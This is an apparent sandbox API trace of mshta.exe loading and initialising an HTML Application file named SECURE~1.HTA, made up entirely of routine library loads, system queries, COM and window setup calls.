[0033.779] AddAtomW (lpString="{4653C0A4-2B2D-48DE-AB80-93910A28F900}") returned 0xc000
[0033.779] EtwEventRegister (in: ProviderId=0xb8a8a2f3a0, EnableCallback=0x7ffb22483090, CallbackContext=0x7ffb238b2dd0, RegHandle=0x7ffb238b2df0 | out: RegHandle=0x7ffb238b2df0) returned 0x0
[0033.780] VirtualQuery (in: lpAddress=0x7ffb239e6000, lpBuffer=0xb8a8a2f150, dwLength=0x30 | out: lpBuffer=0xb8a8a2f150*(BaseAddress=0x7ffb239e6000, AllocationBase=0x7ffb223a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30
[0033.780] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0033.780] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb3c2d0000
[0033.780] GetProcAddress (hModule=0x7ffb3c2d0000, lpProcName=0x7ffb238a7544) returned 0x7ffb3d31e180
[0033.780] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f210 | out: lpflOldProtect=0xb8a8a2f210*=0x4) returned 1
[0033.780] EtwEventSetInformation (RegHandle=0x1800b8a8c208c0, InformationClass=0x2, EventInformation=0x7ffb2372bea1, InformationLength=0x2c) returned 0x0
[0033.780] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0033.780] LoadLibraryExA (lpLibFileName="api-ms-win-downlevel-ole32-l1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb3cc70000
[0033.780] GetProcAddress (hModule=0x7ffb3cc70000, lpProcName=0x7ffb238a698a) returned 0x7ffb3cce2340
[0033.781] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f260 | out: lpflOldProtect=0xb8a8a2f260*=0x4) returned 1
[0033.781] CoCreateGuid (in: pguid=0x7ffb238e45a8 | out: pguid=0x7ffb238e45a8*(Data1=0x6bf86483, Data2=0x299e, Data3=0x4321, Data4=([0]=0x9e, [1]=0xad, [2]=0x27, [3]=0x81, [4]=0x5b, [5]=0x3c, [6]=0xd0, [7]=0x19))) returned 0x0
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec828 | out: ConditionVariable=0x7ffb238ec828)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec820 | out: ConditionVariable=0x7ffb238ec820)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec818 | out: ConditionVariable=0x7ffb238ec818)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec810 | out: ConditionVariable=0x7ffb238ec810)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec808 | out: ConditionVariable=0x7ffb238ec808)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec800 | out: ConditionVariable=0x7ffb238ec800)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7f8 | out: ConditionVariable=0x7ffb238ec7f8)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7f0 | out: ConditionVariable=0x7ffb238ec7f0)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7e8 | out: ConditionVariable=0x7ffb238ec7e8)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7e0 | out: ConditionVariable=0x7ffb238ec7e0)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7d8 | out: ConditionVariable=0x7ffb238ec7d8)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238f1030 | out: ConditionVariable=0x7ffb238f1030)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7d0 | out: ConditionVariable=0x7ffb238ec7d0)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7c8 | out: ConditionVariable=0x7ffb238ec7c8)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7c0 | out: ConditionVariable=0x7ffb238ec7c0)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7b8 | out: ConditionVariable=0x7ffb238ec7b8)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec860 | out: ConditionVariable=0x7ffb238ec860)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7b0 | out: ConditionVariable=0x7ffb238ec7b0)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7a8 | out: ConditionVariable=0x7ffb238ec7a8)
[0033.821] RtlInitializeConditionVariable (in: ConditionVariable=0x7ffb238ec7a0 | out: ConditionVariable=0x7ffb238ec7a0)
[0033.822] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0033.822] LoadLibraryExA (lpLibFileName="urlmon.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb2ea50000
[0034.486] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName="CoInternetIsFeatureEnabled") returned 0x7ffb2ea86410
[0034.486] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f220 | out: lpflOldProtect=0xb8a8a2f220*=0x4) returned 1
[0034.486] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0034.487] GetVersionExA (in: lpVersionInformation=0x7ffb238e9330*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x7ffb238e9330*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0034.494] GetSystemMetrics (nIndex=68) returned 4
[0034.494] GetSystemMetrics (nIndex=69) returned 4
[0034.494] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14
[0034.495] GetVersionExW (in: lpVersionInformation=0xb8a8a2f150*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0xd4, szCSDVersion="") | out: lpVersionInformation=0xb8a8a2f150*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0034.495] GetUserDefaultUILanguage () returned 0x409
[0034.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0xb8a8a2f258, cchData=16 | out: lpLCData="\x03") returned 16
[0034.495] GetKeyboardLayoutList (in: nBuff=32, lpList=0xb8a8a2f2b0 | out: lpList=0xb8a8a2f2b0) returned 1
[0034.495] GetCurrentProcessId () returned 0x700
[0034.495] ProcessIdToSessionId (in: dwProcessId=0x700, pSessionId=0xb8a8a2f270 | out: pSessionId=0xb8a8a2f270) returned 1
[0034.495] WTSGetActiveConsoleSessionId () returned 0x1
[0034.496] HeapSetInformation (HeapHandle=0xc0aabe0000, HeapInformationClass=0x0, HeapInformation=0xb8a8a2f400, HeapInformationLength=0x4) returned 1
[0034.496] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a
[0034.496] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b
[0034.496] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d
[0034.496] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f
[0034.496] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e
[0034.500] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0034.500] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0034.500] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0034.500] VerifyVersionInfoW (in: lpVersionInformation=0xb8a8a2ed70, dwTypeMask=0x23, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0xb8a8a2ed70) returned 0
[0034.500] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x203000, flProtect=0x4) returned 0xc0aaad0000
[0034.501] VirtualAlloc (lpAddress=0xb8b6a7a000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0xb8b6a7a000
[0034.503] SystemParametersInfoW (in: uiAction=0x4a, uiParam=0x0, pvParam=0xb8a8a2f3b0, fWinIni=0x0 | out: pvParam=0xb8a8a2f3b0) returned 1
[0034.504] SystemParametersInfoW (in: uiAction=0x200a, uiParam=0x0, pvParam=0xb8a8a2f3b4, fWinIni=0x0 | out: pvParam=0xb8a8a2f3b4) returned 1
[0034.504] GetCurrentProcessId () returned 0x700
[0034.504] _vsnwprintf (in: _Buffer=0xb8a8a2f408, _BufferCount=0x16, _Format="%s%08lX", _ArgList=0xb8a8a2f3e8 | out: _Buffer="#MSHTML#PERF#00000700") returned 21
[0034.504] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000700") returned 0x0
[0034.504] EtwEventRegister (in: ProviderId=0x7ffb234935f8, EnableCallback=0x7ffb2244d760, CallbackContext=0x7ffb238c26e0, RegHandle=0x7ffb238ec778 | out: RegHandle=0x7ffb238ec778) returned 0x0
[0034.504] EtwEventSetInformation (RegHandle=0x1500b8a8c1e480, InformationClass=0x2, EventInformation=0x7ffb234935e0, InformationLength=0x16) returned 0x0
[0034.504] EtwEventRegister (in: ProviderId=0x7ffb234935d0, EnableCallback=0x7ffb2244d760, CallbackContext=0x7ffb238c2d10, RegHandle=0x7ffb238ec780 | out: RegHandle=0x7ffb238ec780) returned 0x0
[0034.504] EtwEventRegister (in: ProviderId=0x7ffb234935c0, EnableCallback=0x7ffb2244d760, CallbackContext=0x7ffb238c2c70, RegHandle=0x7ffb238ec788 | out: RegHandle=0x7ffb238ec788) returned 0x0
[0034.504] EtwEventRegister (in: ProviderId=0x7ffb234935b0, EnableCallback=0x7ffb2244d760, CallbackContext=0x7ffb238c2cc0, RegHandle=0x7ffb238ec790 | out: RegHandle=0x7ffb238ec790) returned 0x0
[0034.504] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\OUTLOOK.EXE", lpValue="Path", dwFlags=0x2, pdwType=0x0, pvData=0xb8a8a2f1a0, pcbData=0xb8a8a2f184*=0x208 | out: pdwType=0x0, pvData=0xb8a8a2f1a0, pcbData=0xb8a8a2f184*=0x62) returned 0x0
[0034.513] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Program Files\\Microsoft Office\\Root\\Office16\\outllib.dll", lpdwHandle=0xb8a8a2f188 | out: lpdwHandle=0xb8a8a2f188) returned 0x0
[0034.513] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7237f0000
[0034.513] GetModuleFileNameW (in: hModule=0x7ff7237f0000, lpFilename=0xb8a8a2f1a0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0034.513] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0034.513] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Application Compatibility", lpValue="mshta.exe", dwFlags=0x18, pdwType=0x0, pvData=0xb8a8a2f190, pcbData=0xb8a8a2f194*=0x4 | out: pdwType=0x0, pvData=0xb8a8a2f190, pcbData=0xb8a8a2f194*=0x4) returned 0x2
[0034.514] _itow_s (in: _Value=0, _Buffer=0xb8a8a2f398, _BufferCount=0xa, _Radix=10 | out: _Buffer="0") returned 0x0
[0034.515] _itow_s (in: _Value=1, _Buffer=0xb8a8a2f398, _BufferCount=0xa, _Radix=10 | out: _Buffer="1") returned 0x0
[0034.515] _itow_s (in: _Value=2, _Buffer=0xb8a8a2f398, _BufferCount=0xa, _Radix=10 | out: _Buffer="2") returned 0x0
[0034.515] _itow_s (in: _Value=3, _Buffer=0xb8a8a2f398, _BufferCount=0xa, _Radix=10 | out: _Buffer="3") returned 0x0
[0034.515] _itow_s (in: _Value=4, _Buffer=0xb8a8a2f398, _BufferCount=0xa, _Radix=10 | out: _Buffer="4") returned 0x0
[0034.515] GetCurrentProcess () returned 0xffffffffffffffff
[0034.515] GetProcessTimes (in: hProcess=0xffffffffffffffff, lpCreationTime=0xb8a8a2f358, lpExitTime=0xb8a8a2f348, lpKernelTime=0xb8a8a2f348, lpUserTime=0xb8a8a2f348 | out: lpCreationTime=0xb8a8a2f358, lpExitTime=0xb8a8a2f348, lpKernelTime=0xb8a8a2f348, lpUserTime=0xb8a8a2f348) returned 1
[0034.633] RegCloseKey (hKey=0xb2) returned 0x0
[0034.633] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb3d260000
[0034.633] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="RegisterApplicationRestart") returned 0x7ffb3d2821f0
[0034.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb8a8c127f1, cbMultiByte=-1, lpWideCharStr=0xb8a8ff13a0, cchWideChar=42 | out: lpWideCharStr="\"C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA\" ") returned 42
[0034.634] RegisterApplicationRestart (pwzCommandline="\"C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA\" ", dwFlags=0x0) returned 0x0
[0034.634] GetProcAddress (hModule=0x7ffb223a0000, lpProcName="RunHTMLApplication") returned 0x7ffb22da4930
[0034.637] GetCommandLineW () returned="\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA\" "
[0034.638] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0034.638] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb3cb20000
[0035.316] GetProcAddress (hModule=0x7ffb3cb20000, lpProcName="OleInitialize") returned 0x7ffb3cb2ee90
[0035.316] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2fa40 | out: lpflOldProtect=0xb8a8a2fa40*=0x4) returned 1
[0035.316] OleInitialize (pvReserved=0x0) returned 0x0
[0035.755] IsWindow (hWnd=0x0) returned 0
[0035.755] RegisterClassW (lpWndClass=0xb8a8a2fae0) returned 0xc17c
[0035.756] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff7237f0000, lpParam=0x7ffb238e5d20) returned 0x5016e
[0035.756] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x24, wParam=0x0, lParam=0xb8a8a2f570) returned 0x0
[0035.756] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x81, wParam=0x0, lParam=0xb8a8a2f4f0) returned 0x1
[0035.758] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x83, wParam=0x0, lParam=0xb8a8a2f590) returned 0x0
[0035.864] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x1, wParam=0x0, lParam=0xb8a8a2f4e0) returned 0x0
[0035.864] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x5016e, hMenu=0x0, hInstance=0x7ff7237f0000, lpParam=0x7ffb238e5d20) returned 0x50226
[0035.865] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x24, wParam=0x0, lParam=0xb8a8a2f570) returned 0x0
[0035.865] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x81, wParam=0x0, lParam=0xb8a8a2f4f0) returned 0x1
[0035.865] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x83, wParam=0x0, lParam=0xb8a8a2f590) returned 0x0
[0035.865] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x1, wParam=0x0, lParam=0xb8a8a2f4e0) returned 0x0
[0035.866] SetWindowLongW (hWnd=0x50226, nIndex=-16, dwNewLong=-2100363264) returned 114229248
[0035.866] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x7c, wParam=0xfffffffffffffff0, lParam=0xb8a8a2faf0) returned 0x0
[0035.866] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x7d, wParam=0xfffffffffffffff0, lParam=0xb8a8a2faf0) returned 0x0
[0035.868] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0
[0035.868] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0
[0035.869] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0
[0035.869] SetWindowPos (hWnd=0x50226, hWndInsertAfter=0xfffffffffffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0035.869] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x46, wParam=0x0, lParam=0xb8a8a2fb00) returned 0x0
[0035.869] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x83, wParam=0x1, lParam=0xb8a8a2fad0) returned 0x0
[0035.869] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x47, wParam=0x0, lParam=0xb8a8a2fb00) returned 0x0
[0035.870] SendMessageW (hWnd=0x50226, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0
[0035.870] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0
[0035.870] NtdllDefWindowProc_W (hWnd=0x50226, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0
[0035.870] PathGetArgsW (pszPath="\"C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA\" ") returned=""
[0035.870] wcsncmp (_String1="", _String2="{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}", _MaxCount=0x26) returned -123
[0035.870] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0035.870] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb3a9f0000
[0035.870] GetProcAddress (hModule=0x7ffb3a9f0000, lpProcName="PathRemoveArgsW") returned 0x7ffb3a9fbe60
[0035.870] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f9d0 | out: lpflOldProtect=0xb8a8a2f9d0*=0x4) returned 1
[0035.870] PathRemoveArgsW (in: pszPath="\"C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA\" " | out: pszPath="\"C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA\"")
[0035.871] memcpy_s (in: _Destination=0xb8a8c2ee04, _DestinationSize=0x2, _Source=0xb8a8a2fb60, _SourceSize=0x2 | out: _Destination=0xb8a8c2ee04) returned 0x0
[0035.871] PathRemoveBlanksW (in: pszPath="\"C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA\"" | out: pszPath="\"C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA\"")
[0035.871] PathUnquoteSpacesW (in: lpsz="\"C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA\"" | out: lpsz="C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA") returned 1
[0035.871] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0035.871] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName="CreateURLMonikerEx") returned 0x7ffb2ea74fe0
[0035.871] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f9d0 | out: lpflOldProtect=0xb8a8a2f9d0*=0x4) returned 1
[0035.871] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="C:\\Users\\CIIHMN~1\\Desktop\\SECURE~1.HTA", ppmk=0xb8a8a2fbe8*=0x0, dwFlags=0x1 | out: ppmk=0xb8a8a2fbe8*=0xb8a8c15f50) returned 0x0
[0035.896] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0035.896] GetProcAddress (hModule=0x7ffb3cc70000, lpProcName="CoCreateInstance") returned 0x7ffb3ccf7000
[0035.896] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f9c0 | out: lpflOldProtect=0xb8a8a2f9c0*=0x4) returned 1
[0035.897] CoCreateInstance (in: rclsid=0x7ffb235faaa8*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb23467978*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7ffb238e5db8 | out: ppv=0x7ffb238e5db8*=0xc0aab08000) returned 0x0
[0036.021] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.021] GetProcAddress (hModule=0x7ffb3cb20000, lpProcName="CoIncrementMTAUsage") returned 0x7ffb3cd38bd0
[0036.021] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e250 | out: lpflOldProtect=0xb8a8a2e250*=0x4) returned 1
[0036.021] CoIncrementMTAUsage (in: pCookie=0xb8a8a2e400 | out: pCookie=0xb8a8a2e400) returned 0x0
[0036.034] RegisterClassExW (param_1=0xb8a8a2e2c0) returned 0xc123
[0036.034] CreateWindowExW (dwExStyle=0x8000080, lpClassName=0xc123, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x7ffb223a0000, lpParam=0x0) returned 0x50210
[0036.035] GetWindowLongW (hWnd=0x50210, nIndex=-20) returned 134217856
[0036.035] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x81, wParam=0x0, lParam=0xb8a8a2ddf0) returned 0x1
[0036.035] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x83, wParam=0x0, lParam=0xb8a8a2de40) returned 0x0
[0036.035] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x1, wParam=0x0, lParam=0xb8a8a2ddf0) returned 0x0
[0036.035] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0
[0036.035] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0
[0036.035] ShowWindow (hWnd=0x50210, nCmdShow=8) returned 0
[0036.035] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0
[0036.035] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x46, wParam=0x0, lParam=0xb8a8a2e3b0) returned 0x0
[0036.037] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x47, wParam=0x0, lParam=0xb8a8a2e3b0) returned 0x0
[0036.037] SetWindowPos (hWnd=0x50210, hWndInsertAfter=0x1, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1
[0036.037] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x46, wParam=0x0, lParam=0xb8a8a2e3b0) returned 0x0
[0036.037] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x47, wParam=0x0, lParam=0xb8a8a2e3b0) returned 0x0
[0036.039] GetModuleHandleW (lpModuleName="user32") returned 0x7ffb3c650000
[0036.039] GetProcAddress (hModule=0x7ffb3c650000, lpProcName="SetCoalescableTimer") returned 0x7ffb3c67fdd0
[0036.039] CreateCompatibleDC (hdc=0x0) returned 0xe01077b
[0036.039] GetDeviceCaps (hdc=0xe01077b, index=88) returned 96
[0036.039] GetCurrentProcess () returned 0xffffffffffffffff
[0036.039] MulDiv (nNumber=96, nNumerator=100, nDenominator=96) returned 100
[0036.039] GetSystemMetrics (nIndex=1) returned 900
[0036.039] GetSystemMetrics (nIndex=0) returned 1440
[0036.039] GetSystemMetrics (nIndex=68) returned 4
[0036.039] GetSystemMetrics (nIndex=69) returned 4
[0036.039] GetSystemMetrics (nIndex=2) returned 17
[0036.039] GetSystemMetrics (nIndex=3) returned 17
[0036.039] SystemParametersInfoW (in: uiAction=0x29, uiParam=0x1f8, pvParam=0xb8a8a2e190, fWinIni=0x0 | out: pvParam=0xb8a8a2e190) returned 1
[0036.039] CreateFontIndirectW (lplf=0xb8a8a2e328) returned 0x6a0a0632
[0036.039] SelectObject (hdc=0xe01077b, h=0x6a0a0632) returned 0x18a0048
[0036.039] GetTextMetricsW (in: hdc=0xe01077b, lptm=0xb8a8a2e3d8 | out: lptm=0xb8a8a2e3d8) returned 1
[0036.039] SelectObject (hdc=0xe01077b, h=0x18a0048) returned 0x6a0a0632
[0036.039] DeleteObject (ho=0x6a0a0632) returned 1
[0036.040] GetSystemDefaultLCID () returned 0x409
[0036.040] GetUserDefaultLCID () returned 0x409
[0036.040] GetACP () returned 0x4e4
[0036.040] GetLocaleInfoW (in: Locale=0x400, LCType=0x20001014, lpLCData=0xb8a8a2e370, cchData=2 | out: lpLCData="\x01") returned 2
[0036.040] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0xb8a8a2e378, cchData=11 | out: lpLCData="0123456789") returned 11
[0036.040] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7ffb238f0b98, fWinIni=0x0 | out: pvParam=0x7ffb238f0b98) returned 1
[0036.040] SystemParametersInfoW (in: uiAction=0x42, uiParam=0x10, pvParam=0xb8a8a2e390, fWinIni=0x0 | out: pvParam=0xb8a8a2e390) returned 1
[0036.040] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0036.040] LoadLibraryExA (lpLibFileName="UxTheme.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb38610000
[0036.040] GetProcAddress (hModule=0x7ffb38610000, lpProcName=0x7ffb238a8870) returned 0x7ffb386128c0
[0036.041] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e240 | out: lpflOldProtect=0xb8a8a2e240*=0x4) returned 1
[0036.041] IsAppThemed () returned 0x1
[0036.041] SystemParametersInfoW (in: uiAction=0x1042, uiParam=0x0, pvParam=0x7ffb238c346c, fWinIni=0x0 | out: pvParam=0x7ffb238c346c) returned 1
[0036.041] SystemParametersInfoW (in: uiAction=0x103e, uiParam=0x0, pvParam=0x7ffb238c3468, fWinIni=0x0 | out: pvParam=0x7ffb238c3468) returned 1
[0036.047] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x190
[0036.047] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x194
[0036.048] GetCurrentThreadId () returned 0x210
[0036.048] GetSystemWindowsDirectoryW (in: lpBuffer=0xb8a8a2e290, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa
[0036.048] CreateActCtxW (pActCtx=0xb8a8a2e250) returned 0xb8a8c35a98
[0036.050] ActivateActCtx (in: hActCtx=0xb8a8c35a98, lpCookie=0xb8a8a2e210 | out: hActCtx=0xb8a8c35a98, lpCookie=0xb8a8a2e210) returned 1
[0036.050] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb34cc0000
[0036.418] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10019c9900000001) returned 1
[0036.418] GetCurrentProcess () returned 0xffffffffffffffff
